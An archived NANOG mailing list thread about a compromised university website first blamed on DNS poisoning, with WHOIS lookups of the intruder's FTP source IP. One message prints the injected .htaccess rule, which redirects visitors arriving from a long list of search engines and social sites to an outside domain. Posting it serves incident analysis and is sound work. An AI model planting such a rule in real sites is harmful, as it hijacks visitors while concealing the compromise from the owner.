nanog mailing list archives
Re: No DNS poisoning at Google (in case of trouble, blame the DNS)
From: Kyle Creyts <kyle.creyts () gmail com>
Date: Tue, 3 Jul 2012 14:33:23 -0400
and upon further investigation, it seems like there might be an actual organization using a host with that IP... http://www.robtex.com/dns/chatwithus.net.html#shared On Tue, Jul 3, 2012 at 2:27 PM, Kyle Creyts <kyle.creyts () gmail com> wrote:
it actually appears that skywire has a suballocation for that block, http://www.robtex.com/ip/208.88.11.111.html#whois # # The following results may also be obtained via: # http://whois.arin.net <http://www.robtex.com/dns/whois.arin.net.html> /rest/nets;q=208.88.11.111 <http://www.robtex.com/ip/208.88.11.111.html> ?showDetails=true&showARIN=false&ext=netref2 # American West Internet SKYWIRE-SG (NET-208-88-11-0-1) 208.88.11.0<http://www.robtex.com/ip/208.88.11.0.html> - 208.88.11.255 <http://www.robtex.com/ip/208.88.11.255.html> Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0<http://www.robtex.com/ip/208.88.8.0.html> - 208.88.11.255 <http://www.robtex.com/ip/208.88.11.255.html> # # ARIN WHOIS data and services are subject to the Terms of Use # available at: https://www.arin.net<http://www.robtex.com/dns/www.arin.net.html> /whois_tou.html # On Wed, Jun 27, 2012 at 12:56 PM, Matthew Black <Matthew.Black () csulb edu>wrote:By the way, FTP access originated from: 208.88.11.111 Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 - 208.88.11.255 NetRange: 208.88.8.0 - 208.88.11.255 CIDR: 208.88.8.0/22 OriginAS: AS40603 NetName: SKYWIRE-SG NetHandle: NET-208-88-8-0-1 Parent: NET-208-0-0-0-0 NetType: Direct Allocation Comment: http://www.skywireusa.com RegDate: 2008-03-04 Updated: 2012-03-02 Ref: http://whois.arin.net/rest/net/NET-208-88-8-0-1 OrgName: Sky Wire Communications OrgId: DGSU Address: 946 W Sunset Blvd Ste L City: St George StateProv: UT PostalCode: 84770 Country: US RegDate: 2007-12-04 Updated: 2009-11-04 Ref: http://whois.arin.net/rest/org/DGSU Who We Are Skywire Communications is the Leading High Speed Internet Provider in Southern Utah. Offering Service in St George, Washington, Santa Clara, Ivins, Cedar City, and Enoch. It is the goal of SkyWire Communications to provide high speed internet access to 100 Percent of Southern Utah. We are located in St George, Utah. matthew black information technology services california state university, long beach -----Original Message----- From: Matthew Black [mailto:Matthew.Black () csulb edu] Sent: Wednesday, June 27, 2012 9:52 AM To: 'Jason Hellenthal'; Arturo Servin Cc: nanog () nanog org Subject: RE: No DNS poisoning at Google (in case of trouble, blame the DNS) Ask and ye shall receive: # more .htaccess (backup copy) #c3284d# <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|alt avista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysea rch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|d ogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditirel and|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsea rchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick| jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|l ive|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlse arch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|sea rchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|s uchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-onlin e|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche| westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*) RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L] </IfModule> #/c3284d# # # # matthew black information technology services california state university, long beach -----Original Message----- From: Jason Hellenthal [mailto:jhellenthal () dataix net] Sent: Wednesday, June 27, 2012 6:26 AM To: Arturo Servin Cc: nanog () nanog org Subject: Re: No DNS poisoning at Google (in case of trouble, blame the DNS) What would be nice is the to see the contents of the htaccess file (obviously with sensitive information excluded) On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote:It was not DNS issue, but it was a clear case on how community-supporthelped.Some of us may even learn some new tricks. :) Regards, as Sent from mobile device. Excuse brevity and typos. On 27 Jun 2012, at 05:07, Daniel Rohan <drohan () gmail com> wrote:On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer <bortzmeyer () nic fr>wrote:What made you think it can be a DNS cache poisoning (a very rareevent, despite what the media say) when there are many much more realistic possibilities (<troll>specially for a Web site written in PHP</troll>)? What was the evidence pointing to a DNS problem?It seems likely that he made a mistake in his analysis of theevidence.Something that could happen to anyone when operating outside of acomfortzone or having a bad day. Go easy. -DR-- - (2^(N-1))-- Kyle Creyts Information Assurance Professional BSidesDetroit Organizer
-- Kyle Creyts Information Assurance Professional BSidesDetroit Organizer
Current thread:
- Re: No DNS poisoning at Google (in case of trouble, blame the DNS) Kyle Creyts (Jul 03)
- Re: No DNS poisoning at Google (in case of trouble, blame the DNS) Kyle Creyts (Jul 03)